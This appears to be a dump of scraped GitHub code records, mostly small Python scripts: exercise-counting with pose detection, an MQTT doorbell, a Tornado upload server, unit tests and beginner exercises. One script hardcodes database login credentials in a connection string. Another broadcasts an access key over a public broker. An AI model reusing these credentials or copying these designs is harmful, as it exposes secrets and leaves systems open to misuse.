convert_to_sequences(words):\n result = []\n for it in words:\n it = it.strip()\n if it in x_tkn.word_index:\n result.append(x_tkn.word_index[it])\n elif is_debug():\n print(\"Token doesn't exist on lexicon: %s\"%it)\n\n return nodetails.prep.pad_sequences([result],\n maxlen=x_len,\n padding=\"post\")[0]\n\n query_cleaned = nodetails.prep.clean_text(query)\n\n query_seq = convert_to_sequences(query_cleaned.split())\n prediction = decode_sequence(query_seq.reshape(1, x_len), abs_model)\n if is_debug():\n print(\"\\n == INFERENCE ==\\n\")\n\n print(\" Query:\", query)\n print(\" query_cleaned:\", query_cleaned)\n print(\" Summary:\", prediction)\n\n return prediction\n\n# END OF ndabs.py\n","repo_name":"bozdogan/nodetails","sub_path":"code/nodetails/ndabs.py","file_name":"ndabs.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36370657627","text":"nums = dict(first=1, second=3, third=2)\r\n\r\nsq_num = {key: value ** 2 for key,value in nums.items()}\r\n\r\nprint(sq_num)\r\n\r\nstr1 =\"ABCD\"\r\nstr2 = \"12345\"\r\ncombo = {str1[i]: str2[i] for i in range(0,len(str1))}\r\nprint(combo)\r\n\r\n\r\ninstructor = {\r\n \"name\": \"Colt\",\r\n \"favorite_language\": \"Python\",\r\n}\r\n\r\nyelling_instructor = {k.upper():v.upper() for k,v in instructor.items()}\r\n\r\nprint(yelling_instructor)\r\n\r\nnuems = [1,2,3,4]\r\n\r\nprint({num:(\"even\" if num % 2 == 0 else \"odd\") for num in range(1,100)})\r\n\r\n\r\n","repo_name":"pwnmeow/Basic-Python-Exercise-Files","sub_path":"basics/DictionariesComprihension.py","file_name":"DictionariesComprihension.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4878773892","text":"# Jeremiah Soyebo - 1902930 #\r\n\r\nimport csv\r\nfileInput = input()\r\nwith open(fileInput, 'r') as file:\r\n reader = csv.reader(file, delimiter=',')\r\n for row in reader:\r\n wordList = set(row)\r\n for word in wordList:\r\n count = row.count(word)\r\n print(word, count) # cant figure out what I'm doing wrong in zyLabs #\r\n","repo_name":"jeremiahsoyebo/CIS-2348","sub_path":"Homework_2/ZyLab9_10.py","file_name":"ZyLab9_10.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29090769874","text":" # push data\nfrom fileinput import filename\n\nimport cap as cap\nimport cv2\nimport mediapipe as mp\nimport numpy as np\nimport PoseModule as pm\nfrom pymongo import MongoClient # import mongo client to connect\nimport pprint\nfrom tkinter import ttk, CENTER, filedialog\nimport tkinter as tk\n\n\n# print(z[0][1])\n\nroot = tk.Tk()\nroot.geometry(\"700x500\")\nroot.title(\"List\")\nroot.configure()\nroot['background'] = '#AED6F1'\n\nlbl1 = tk.Label(root, text=\"Welcome to exercise recognition App\", background=\"#5DADE2\", fg=\"white\", font=\"none 24 bold\")\nlbl1.config(anchor=CENTER)\nlbl1.pack(padx=5, pady=25)\n\nframe = tk.LabelFrame(root, background=\"#5DADE2\", text='choice your method')\nframe.pack(padx=5, pady=(40, 10))\n\nselection = tk.IntVar()\nOPTIONS = [\n \"Push Up\",\n \"Seat Up\",\n \"Surya Namashkar\"\n] # etc\n\nvariable = tk.StringVar(root)\nvariable.set(OPTIONS[0])\n\ndef onRadioButtonChange():\n if selection.get() != 0:\n print(\"1\")\n b1[\"state\"] = \"active\"\n\n else:\n print(\"2\")\n b1[\"state\"] = \"disabled\"\n\n\n\ndef browsefunc():\n global filename\n filename = filedialog.askopenfilename()\n\n\n\n\ntk.Radiobutton(frame, command=onRadioButtonChange, text=\"Opern camara (Live)\", variable=selection, value=0).grid(\n column=0, row=0)\ntk.Radiobutton(frame, command=onRadioButtonChange, text=\"Using local storage\", variable=selection, value=1).grid(\n column=1, row=0)\n\n\nb1 = browsebutton = tk.Button(root, text=\"Browse\", state=\"disable\", command=browsefunc)\nb1.pack(pady=(5, 40))\n\nw = tk.OptionMenu(root, variable, *OPTIONS)\nw.pack()\n\n\ndef submit():\n # Creating instance of mongoclient\n client = MongoClient(\"mongodb+srv://test:test@cluster0.9sg1rjo.mongodb.net/?retryWrites=true&w=majority\")\n # Creating database\n db = client.Exercise\n employee = db.pushup\n employee = db.seatup\n detector = pm.poseDetector()\n count = 0\n direction = 0\n seatup = 0\n pushup = 0\n form = 0\n feedback = \"Fix Form\"\n angle = 0\n l = 0\n r = 0\n z = []\n\n col_1 = db.col_1\n col_2 = db.col_2\n col_3 = db.col_3\n col_4 = db.col_4\n col_5 = db.col_5\n col_6 = db.col_6\n col_7 = db.col_7\n col_8 = db.col_8\n col_9 = db.col_9\n col_10 = db.col_10\n col_11 = db.col_11\n col_12 = db.col_12\n step = 0\n\n dir_1 = 0\n dir_2 = 0\n dir_3 = 0\n dir_4 = 0\n dir_5 = 0\n dir_6 = 0\n dir_7 = 0\n dir_8 = 0\n dir_9 = 0\n dir_10 = 0\n dir_11 = 0\n dir_12 = 1\n\n\n for y in employee.find({}, {'_id': 0, 'pushup_data': 1}):\n z.append(y.get('pushup_data'))\n print(z)\n\n count=0\n print (\"value is:\" + variable.get())\n if(variable.get()==\"Push Up\"):\n form = 1\n elif(variable.get()==\"Seat Up\"):\n form = 4\n elif(variable.get()==\"Surya Namashkar\"):\n form = 3\n\n if(b1[\"state\"]==\"disabled\"):\n cap = cv2.VideoCapture(0)\n else:\n print(filename)\n cap = cv2.VideoCapture(filename)\n if(filename==\"\"):\n print(\"no file\")\n\n\n\n detector = pm.poseDetector()\n\n while cap.isOpened():\n ret, img = cap.read() # 640 x 480\n # Determine dimensions of video - Help with creation of box in Line 43\n width = cap.get(3) # float `width`\n height = cap.get(4) # float `height`\n # print(width, height)\n\n img = detector.findPose(img, False)\n lmList = detector.findPosition(img, False)\n # print(lmList)\n if len(lmList) != 0:\n elbow_left = detector.findAngle(img, 11, 13, 15)\n elbow_right = detector.findAngle(img, 12, 14, 16)\n leg_left = detector.findAngle(img, 23, 25, 27)\n leg_right = detector.findAngle(img, 24, 26, 28)\n\n temp = []\n temp.append(int(elbow_left))\n temp.append(int(elbow_right))\n temp.append(int(leg_left))\n temp.append(int(leg_right))\n \"\"\"shoulder = detector.findAngle(img, 13, 11, 23)\n hip = detector.findAngle(img, 11, 23,25)\"\"\"\n\n # Percentage of success of pushup\n per_left = np.interp(elbow_left, (90, 160), (0, 100))\n per_right = np.interp(elbow_right, (90, 160), (0, 100))\n\n # Bar to show Pushup progress\n bar_left = np.interp(elbow_left, (90, 160), (380, 50))\n bar_right = np.interp(elbow_right, (90, 160), (380, 50))\n\n # if( 1 ):\n # for i in range(4):\n # if(temp[0]+2>z[i][0] and temp[0]-2 z[i][1] and temp[1] - 2 < z[i][1] and\n # temp[2] + 2 > z[i][2] and temp[2] - 2 < z[i][2] and temp[3] + 2 > z[i][3] and temp[3] - 2 < z[i][3]):\n # seatup+=1\n\n # print(temp[0]+2)\n # print((z[i][0]))\n # print(temp[0] - 2)\n # print((z[i][0]))\n # if (temp[1] + 2 > z[i][1] and temp[1] - 2 < z[i][1]):\n # seatup += 1\n # # print(temp[1]+2)\n # # print((z[i][0]))\n # # print(temp[1] - 2)\n # # print((z[i][0]))\n # if (temp[2] + 2 > z[i][2] and temp[2] - 2 < z[i][2]):\n # seatup += 1\n # # print(temp[2] + 2)\n # # print((z[i][0]))\n # # print(temp[2] - 2)\n # # print((z[i][0]))\n # if (temp[3] + 2 > z[i][3] and temp[3] - 2 < z[i][3]):\n # seatup += 1\n # # print(temp[3] + 2)\n # # print((z[i][0]))\n # # print(temp[3] - 2)\n # # print((z[i][0]))\n\n # if(seatup==1):\n # print(\"SeatUpOK\")\n # seatup=0\n # angle=1\n # l=temp[2]\n # print(l)\n # # print(seatup)\n # else:\n # seatup=0\n # else:\n # print(leg_left)\n\n # Check to ensure right form before starting the program\n # if elbow_left < 90 and elbow_right < 90:\n # form = 1\n\n # elif elbow_left<50:\n # form = 2\n # elif elbow_right<50:\n # form = 3\n # elif leg_left<80:\n # form = 4\n # if(leg_left<80):\n # form=4\n\n # Check for full range of motion for the pushup\n if form == 1:\n # if per_left == 0 and per_right==0:\n if elbow_left <= 80 and elbow_right <= 80:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n Data = {\n \"pushup_data\": temp\n }\n print(temp)\n print(\"push up\")\n\n # Creating document\n # Creating document\n MyData = db.pushup\n # Inserting data\n MyData.insert_one(Data)\n # Inserting data\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if elbow_left > 160 and elbow_right > 160:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # Check for full range of motion for the pushup\n if form == 2:\n # if per_left == 0 and per_right==0:\n if elbow_left <= 90:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n else:\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if elbow_left > 160:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # Check for full range of motion for the pushup\n if form == 3:\n # if per_left == 0 and per_right==0:\n if elbow_right <= 90:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n else:\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if elbow_right > 160:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # Check for full range of motion for the Seat Up\n if form == 4:\n # if per_left == 0 and per_right==0:\n if leg_left >= 140:\n feedback = \"Up\"\n if direction == 0:\n count += 0.5\n direction = 1\n else:\n feedback = \"Fix Form\"\n\n # if per_left == 100 and per_right==100:\n if leg_left < 80:\n feedback = \"Down\"\n if direction == 1:\n count += 0.5\n direction = 0\n Data = {\n \"pushup_data\": temp\n }\n print(temp)\n print(\"Seat Up\")\n\n # Creating document\n MyData = db.seatup\n # Inserting data\n MyData.insert_one(Data)\n\n else:\n feedback = \"Fix Form\"\n # form = 0\n\n # print(count)\n\n # Draw Bar\n\n if form == 3:\n cv2.rectangle(img, (580, 50), (600, 380), (0, 255, 0), 3)\n cv2.rectangle(img, (580, int(bar_right)), (600, 380), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, f'{int(per_right)}%', (565, 430), cv2.FONT_HERSHEY_PLAIN, 2,\n (255, 0, 0), 2)\n\n if form == 1 or form == 2:\n cv2.rectangle(img, (580, 50), (600, 380), (0, 255, 0), 3)\n cv2.rectangle(img, (580, int(bar_left)), (600, 380), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, f'{int(per_left)}%', (565, 430), cv2.FONT_HERSHEY_PLAIN, 2,\n (255, 0, 0), 2)\n\n # Pushup counter\n cv2.rectangle(img, (0, 380), (100, 480), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, str(int(count)), (25, 455), cv2.FONT_HERSHEY_PLAIN, 5,\n (255, 0, 0), 5)\n\n # Feedback\n cv2.rectangle(img, (500, 0), (640, 40), (255, 255, 255), cv2.FILLED)\n cv2.putText(img, feedback, (500, 40), cv2.FONT_HERSHEY_PLAIN, 2,\n (0, 255, 0), 2)\n\n \"\"\"if (lmList[25][2] and lmList[26][2] >= lmList[23][2] and lmList[24][2]):\n posiotion = \"sit\"\n if (lmList[25][2] and lmList[26][2] <= lmList[23][2] and lmList[24][2] and posiotion == \"sit\"):\n posiotion = \"up\"\n count += 1\n print(\"tirth\")\n print(count)\"\"\"\n\n cv2.imshow('Pushup counter', img)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nb2 = tk.Button(root, text=\"Submit\", command=submit)\nb2.pack(pady=(10, 50))\n\nroot.mainloop()","repo_name":"tirthghelani/Machine_learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17116842747","text":"import random\n\n\n# Генератор вычленения полей из массива словарей\ndef field(items, *args):\n\n for n in items:\n if len(args) == 1:\n if n.get(args[0]):\n yield n.get(args[0])\n else:\n new_items = {}\n for x in args:\n if n.get(x):\n new_items[x] = n[x]\n\n if len(new_items) > 0:\n yield new_items\n\n\n# Генератор списка случайных чисел\ndef gen_random(begin, end, num_count):\n a = 0\n while a < num_count:\n yield random.randint(begin,end)\n a += 1\n","repo_name":"Birukosh/lab4","sub_path":"gens.py","file_name":"gens.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12505913744","text":"def is_prime(n):\n '''Returns True if the given positive number is prime and False otherwise'''\n if n == 1:\n return False\n for i in range(2,n):\n if n%i == 0:\n return False\n else:\n return True\n\ndef str_list_to_int(str_list: list):\n new_list = []\n for el in str_list:\n if not el.isdigit() or int(el) <= 0:\n return None\n\n new_list.append(int(el))\n\n return new_list\n\ndef get_prime_list(int_list):\n prime_list = []\n\n for el in int_list:\n if is_prime(el) and el not in prime_list:\n prime_list.append(el)\n\n return prime_list\n\ndef avg(int_list):\n return round(sum(int_list) / len(int_list), 2)\n\n# The main program starts here\nint_string = input(\"Enter integers separated with commas: \")\nint_list = str_list_to_int(int_string.split(\",\"))\nif int_list is not None:\n print(f\"Input list: {int_list}\")\n int_list.sort()\n print(f\"Sorted list: {int_list}\")\n prime_list = get_prime_list(int_list)\n print(f\"Prime list: {prime_list}\")\n print(f\"Min: {min(int_list)}, Max: {max(int_list)}, Average: {avg(int_list):.2f}\")\nelse:\n print(\"Incorrect input!\")","repo_name":"Illugi317/forritun","sub_path":"Unsorted/a124.py","file_name":"a124.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7435293340","text":"from collections import deque\n\ndef solution(cacheSize, cities):\n answer = 0\n q = deque()\n \n for city in cities :\n if city.upper() in q :\n answer +=1\n q.remove(city.upper())\n else :\n answer +=5\n q.append(city.upper())\n if len(q) > cacheSize :\n q.popleft()\n \n return answer","repo_name":"jaehyun230/Baekjoon_Algorithm","sub_path":"프로그래머스/lv2/17680. [1차] 캐시/[1차] 캐시.py","file_name":"[1차] 캐시.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16171396644","text":"import tornado.httpserver, tornado.ioloop, tornado.options, tornado.web, os.path, random, string\nfrom tornado.options import define, options\nfrom json import dumps\nfrom predict import verify\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\n\nimage_path = '/home/ananye/PycharmProjects/AnthroPositive/tmp/img.jpg'\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/upload\", ImageHandler)\n ]\n tornado.web.Application.__init__(self, handlers)\n\nclass ImageHandler(tornado.web.RequestHandler):\n def post(self):\n binaryImageData = self.request.arguments['media'][0]\n \n with open(image_path, 'wb') as writer:\n writer.write(binaryImageData)\n\n predictor_dict = self.predictor(image_path)\n self.write(dumps(predictor_dict))\n\n def predictor(self, image_path):\n likelihood, verification = verify(image_path)\n predictDict = dict()\n\n predictDict['Probability'] = str(likelihood)\n predictDict['Image'] = 'HUMAN' if verification == 0 else 'NOT HUMAN'\n\n return predictDict\n\ndef main():\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ananyepatel/Project-AnthroPositive","sub_path":"imageTornado.py","file_name":"imageTornado.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37252673781","text":"import unittest\n\nfrom synnefo.lib.singleton import ArgBasedSingleton, ArgBasedSingletonMeta\n\n\nclass SubClassOne(ArgBasedSingleton):\n name = None\n\n def __init__(self, name):\n self.name = name\n\n\nclass SubClassTwo(ArgBasedSingleton):\n name = None\n\n def __init__(self, name):\n self.name = name\n\n\nclass SubClassThree(SubClassTwo):\n name2 = None\n\n def __init__(self, name):\n self.name2 = name\n\n\nclass SubClassKwArgs(ArgBasedSingleton):\n name = None\n\n def __init__(self, onearg, **kwargs):\n self.name = onearg\n for x in kwargs:\n setattr(self, x, kwargs[x])\n\n\nclass SubClassNoReinit(ArgBasedSingleton):\n initialized = None\n\n def __init__(self, *args, **kwargs):\n if self.initialized:\n raise Exception(\"__init__ called twice!\")\n self.initialized = True\n\n\nclass ArgBasedSingletonTestCase(unittest.TestCase):\n def test_same_object(self):\n o1 = ArgBasedSingleton()\n o2 = ArgBasedSingleton()\n self.assertTrue(o1 is o2)\n\n\nclass MyMeta(ArgBasedSingletonMeta):\n def __call__(cls, *args, **kw):\n return super(MyMeta, cls).__call__(*args, **kw)\n\n\nclass BaseClass(object):\n __metaclass__ = MyMeta\n\n def ret5(self):\n return 5\n\n\nclass SubClassMultiple(BaseClass, ArgBasedSingleton):\n name = None\n\n def __init__(self, name):\n name = name\n\n\nclass SubClassTestCase(unittest.TestCase):\n def test_same_object(self):\n o1 = SubClassOne('one')\n o2 = SubClassOne('two')\n o1a = SubClassOne('one')\n\n self.assertEqual(o1.name, 'one')\n self.assertEqual(o2.name, 'two')\n self.assertEqual(o1a.name, 'one')\n self.assertFalse(o1 is o2)\n self.assertTrue(o1 is o1a)\n\n def test_different_classes(self):\n o1 = SubClassOne('one')\n o2 = SubClassTwo('one')\n\n self.assertEqual(o1.name, 'one')\n self.assertEqual(o2.name, 'one')\n self.assertFalse(o1 is o2)\n\n\nclass SubClassKwArgsTestCase(unittest.TestCase):\n def test_init_signature(self):\n self.assertRaises(TypeError, SubClassKwArgs, 'one', 'two')\n\n def test_distinct_kwargs(self):\n o1 = SubClassKwArgs('one', a=1)\n o2 = SubClassKwArgs('two')\n o1a = SubClassKwArgs('one', a=2)\n o1b = SubClassKwArgs('one', a=1)\n o1c = SubClassKwArgs('one', a=1, b=2)\n o1d = SubClassKwArgs('one', b=2, a=1)\n\n self.assertEqual(o1.a, 1)\n self.assertEqual(o1a.a, 2)\n self.assertEqual(o1b.a, 1)\n self.assertRaises(AttributeError, getattr, o2, 'a')\n self.assertFalse(o1 is o2)\n self.assertFalse(o1 is o1a)\n self.assertTrue(o1 is o1b)\n self.assertTrue(o1c is o1d)\n\n\nclass SubClassDistinctDicts(unittest.TestCase):\n def test_distinct_storage_per_subclass(self):\n o1 = SubClassOne('one')\n o2 = SubClassTwo('one')\n o1a = SubClassOne('two')\n o2a = SubClassTwo('two')\n\n self.assertEqual(o1.name, 'one')\n self.assertEqual(o2.name, 'one')\n self.assertEqual(o1a.name, 'two')\n self.assertEqual(o2a.name, 'two')\n self.assertTrue(o1._singles is o1a._singles)\n self.assertTrue(o2._singles is o2a._singles)\n self.assertFalse(o1._singles is o2._singles)\n self.assertFalse(o1a._singles is o2a._singles)\n\n\nclass SubClassThreeTestCase(unittest.TestCase):\n def test_singleton_inheritance(self):\n o1 = SubClassThree('one')\n o2 = SubClassThree('two')\n o1a = SubClassThree('one')\n\n self.assertEquals(o1.name2, 'one')\n self.assertEquals(o2.name2, 'two')\n self.assertEquals(o1a.name2, 'one')\n\n self.assertTrue(o1 is o1a)\n self.assertFalse(o1 is o2)\n\n\nclass SubClassMultipleTestCase(unittest.TestCase):\n def test_multiple_inheritance(self):\n o1 = SubClassMultiple('one')\n o2 = SubClassMultiple('two')\n o1a = SubClassMultiple('one')\n\n self.assertEquals(o1.ret5(), 5)\n self.assertEquals(o2.ret5(), 5)\n self.assertEquals(o1a.ret5(), 5)\n\n self.assertTrue(o1 is o1a)\n self.assertFalse(o1 is o2)\n\n\nclass SubClassNoReinitTestCase(unittest.TestCase):\n def test_no_reinit(self):\n o1 = SubClassNoReinit('one')\n o2 = SubClassNoReinit('one')\n\n self.assertTrue(o1 is o2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mpastyl/websocket-console","sub_path":"synnefo/snf-common/synnefo/lib/singleton/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43003205014","text":"import paho.mqtt.client as mqtt\nimport keyboard\nimport os\nimport string\nimport time\nimport random\n\ni = 0\ntemp = ['']\n\nfor i in range(3):\n try:\n f = open(f\"{os.getcwd()}/Messages/message{i}.txt\", 'r')\n temp.append(f.read())\n f.close()\n except (FileNotFoundError, IOError):\n print(f\"File 'message{i}' not found. Please make sure there is a /Messages folder in the root directory and run setup.py\") \n exit()\n\nif(temp[1] == '' or temp[2] == '' or temp[3] == ''):\n print(\"Messages are not set up correctly. Please run the setup.py file.\")\n exit()\n\nmqttBroker = \"mqtt.eclipseprojects.io\"\nclient = mqtt.Client(\"DOORBELL1-PUB\")\nclient.connect(mqttBroker)\n\nwhile True:\n time.sleep(0.2)\n keypress = keyboard.is_pressed(\"e\")\n while ~keypress:\n #This creates a random string of 10 characters. A valid password looks like: AlaBcDeFgHiJ\n key = (''.join(random.choice(string.ascii_letters) for i in range(10)))\n #Key is published to topic. Most vulnerable point of the whole system is this topic.\n client.publish(\"KEY1\", key)\n print(key)\n break\n\n while keypress:\n time.sleep(0.3)\n keypress_1 = keyboard.is_pressed(\"e\")\n if keypress_1: #Here we're concluding the user has held the button for more than a second.\n client.publish(\"DOORBELL1-PUB\", f\"{temp[2]} - {key}\")\n print(f\"{temp[2]} - {key}\")\n os.system(f\"python3 {os.getcwd()}/Publisher.py\")\n exit()\n elif ~keypress_1: #Now, the button was pressed once and then let go.\n print(\"WAITING FOR NEW INPUT\")\n time.sleep(0.5)\n keypress_2 = keyboard.is_pressed(\"e\")\n if keypress_2: #Here we're concluding the user has held the button for more than a second.\n client.publish(\"DOORBELL1-PUB\", f\"{temp[3]} - {key}\")\n print(f\"{temp[3]} - {key}\")\n os.system(f\"python3 {os.getcwd()}/Publisher.py\")\n exit()\n elif ~keypress_2: #Now, the button was pressed once and then let go.\n client.publish(\"DOORBELL1-PUB\", f\"{temp[1]} - {key}\")\n print(f\"{temp[1]} - {key}\")\n os.system(f\"python3 {os.getcwd()}/Publisher.py\")\n exit()","repo_name":"IAmAru/DoorbellProject","sub_path":"Publisher.py","file_name":"Publisher.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30775995691","text":"from __future__ import absolute_import, print_function\n\nimport os.path\nimport unittest\n\nimport anyconfig\n\nfrom tests.common import _bytes as _b, dicts_equal\n\n\n_CURDIR = os.path.dirname(__file__)\n_CID = \"cbor2\" # .. seealso:: anyconfig_cbor2_backend/cbor2.py\n\n\nclass Test(unittest.TestCase):\n\n conf_path = os.path.join(_CURDIR, \"res\", \"0.cbor\")\n\n def _load_helper(self, **kwargs):\n try:\n anyconfig.api.load_plugins()\n return anyconfig.load(self.conf_path, **kwargs)\n except anyconfig.UnknownFileTypeError:\n for psr in anyconfig.api.Parsers.list():\n print(\"%r: type=%r, exts=%r\" % (psr, psr.type(),\n psr.extensions()))\n raise\n\n def test_20_load(self):\n cnf = self._load_helper()\n ref = {_b('a'): 0,\n _b('b'): _b('bbb'),\n _b('c'): 5,\n _b('sect0'): {_b('d'): [_b('x'), _b('y'), _b('z')]}}\n self.assertTrue(dicts_equal(cnf, ref))\n\n def test_22_load__explicit_use(self):\n cnf = self._load_helper(ac_parser=_CID)\n ref = {_b('a'): 0,\n _b('b'): _b('bbb'),\n _b('c'): 5,\n _b('sect0'): {_b('d'): [_b('x'), _b('y'), _b('z')]}}\n self.assertTrue(dicts_equal(cnf, ref))\n\n# vim:sw=4:ts=4:et:\n","repo_name":"ssato/python-anyconfig-cbor2-backend","sub_path":"tests/test_plugin.py","file_name":"test_plugin.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23641693421","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom math import ceil, floor\n \ndef line2intlist(line):\n\tlist = line.split(' ')\n\tnumbers = [ int(x) for x in list ]\n\treturn numbers\n\ndef getDist(points, isSurp=False):\n\tp = floor(points / 3.0)\n\ttrip = [p, p, p]\n\tif 3*p < points:\n\t\ttrip[0] += 1\n\tif (3*p + 1) < points:\n\t\ttrip[1] += 1\n\n\ttrip.sort(reverse=True)\n\n\tif isSurp and (trip[1] == trip[0]) and trip[1] > 0:\n\t\ttrip[1] -= 1\n\t\ttrip[0] += 1\n\t\ttrip.sort(reverse=True)\n\n\treturn trip\n \ndef maxGooglers(nrOfGooglers, surprising, p, points):\n\tmg = 0\n\tsurp = 0\n\tfor pi in points:\n\t\ttrip = getDist(pi, True)\n\t\tif ceil(pi/3.0) >= p:\n\t\t\tmg += 1\n\t\telif trip[0] >= p:\n\t\t\tsurp += 1\n\t\n\tmg += min(surp, surprising)\n\n\treturn mg\n \nif __name__ == \"__main__\":\n\ttestcases = input()\n \n\tfor caseNr in xrange(0, testcases):\n\t\toriginalList = line2intlist(raw_input())\n\t\tnrOfGooglers = originalList[0]\n\t\tsurprising = originalList[1]\n\t\tp = originalList[2]\n\t\tpoints = originalList[3:]\n\t\tprint(\"Case #%i: %i\" % (caseNr+1, maxGooglers(nrOfGooglers, surprising, p, points)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/823.py","file_name":"823.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31608693200","text":"import logging\nimport logging.handlers\n\nroot_logger = logging.getLogger()\nroot_logger.setLevel(logging.INFO)\n\n# Some libraries attempt to add their own root logger handlers. This is\n# annoying and so we get rid of them.\nfor handler in list(root_logger.handlers):\n root_logger.removeHandler(handler)\n\nlogfmt_str = \"%(asctime)s %(levelname)-8s pid:%(process)d %(name)s:%(lineno)03d:%(funcName)s %(message)s\"\nformatter = logging.Formatter(logfmt_str)\n\nstreamHandler = logging.StreamHandler()\nstreamHandler.setFormatter(formatter)\nstreamHandler.setLevel(logging.DEBUG)\n\nroot_logger.addHandler(streamHandler)\n","repo_name":"deep-learning-with-pytorch/dlwpt-code","sub_path":"util/logconf.py","file_name":"logconf.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":4287,"dataset":"github-code","pt":"61"} +{"seq_id":"9938357170","text":"instructions = [x.strip(\"\\n\") for x in open(\"input.txt\").readlines()]\ncounts = [0] * len(instructions)\ni = 0\nacc = 0\nwhile True:\n instruction = instructions[i]\n operation, arg = instruction.split(\" \")\n arg = int(arg)\n counts[i] += 1\n if counts[i] > 1:\n print(acc)\n break\n\n if operation == \"acc\":\n acc += arg\n i += 1\n elif operation == \"jmp\":\n i += arg\n elif operation == \"nop\":\n i += 1\n","repo_name":"brisutom/AoC2020","sub_path":"08/08_part1.py","file_name":"08_part1.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11316686335","text":"\r\n\r\n\r\ndef calcTime(amount, goal, rate):\r\n\tif amount < goal:\r\n\t\treturn (goal-amount)/rate\r\n\treturn 0\r\n\r\n\r\n\r\n\r\n\r\ninc = 1.3\r\nnames = ['curse jar', 'card collection', 'sons college fund', 'government bonds', 'wine collection', 'money printer', 'timeshares', 'pizza franchaise', 'condo development', 'film production', 'pharmaceuticals', 'ponzi scheme', 'startup incubator', 'microloans', 'utility monopoly', 'carbon credit', 'peer to peer lending', 'pneumatic tube transportation', 'time machine technology']\r\nprices = [14600, 217100, 32.1e6, 47.1e3, 136.2e6, 2.1e6, 3.8e6, 20.7e6, 504.4e6, 1.6e9, 376e9, 6.1e12, 3.1e12, 18.9e12, 96.5e12, 352.7e12, 1e15, 25e15, 400e15]\r\npays = [1, 2, 5, 16, 50, 200, 800, 3e3, 10.5e3, 28e3, 75e3, 2.2e6, 10e6, 300e6, 15.2e9, 60.2e9, 100e9, 15e12, 2e15]\r\nlevels = [0 for i in range(19)]\r\n\r\ngoal = 2e15\r\nrate = 396.4e9\r\ntime = 0\r\n\r\n\r\nwhile rate*100 < goal:\r\n\ttimes = [1e20 for i in range(19)]\r\n\tfor i in range(13, 19):\r\n\t\tprice = prices[i]*inc**levels[i]\r\n\t\ttimes[i] = calcTime(0, price, rate) + calcTime(0, goal, rate+pays[i])\r\n\tminTime = times.index(min(times))\r\n\ttime += calcTime(0, prices[minTime]*inc**levels[minTime], rate)\r\n\trate += pays[minTime]\r\n\tlevels[minTime] += 1\r\n\tprint(names[minTime], rate, rate/goal, time)\r\n\tinput()\r\n\r\n\r\nprint(time)","repo_name":"maxbergmark/old-work","sub_path":"Egna projekt/moneymaker.py","file_name":"moneymaker.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25257210519","text":"import os\nimport re\nimport asyncio\nimport json\nfrom EdgeGPT.EdgeGPT import Chatbot, ConversationStyle\n\nclass FileHandler:\n def __init__(self, args, file_dir=None):\n if file_dir is None:\n self.file_dir = 'log/' + args.title + '/'\n self.make_dir(self.file_dir)\n \n def make_dir(self, path):\n if not os.path.exists(path):\n 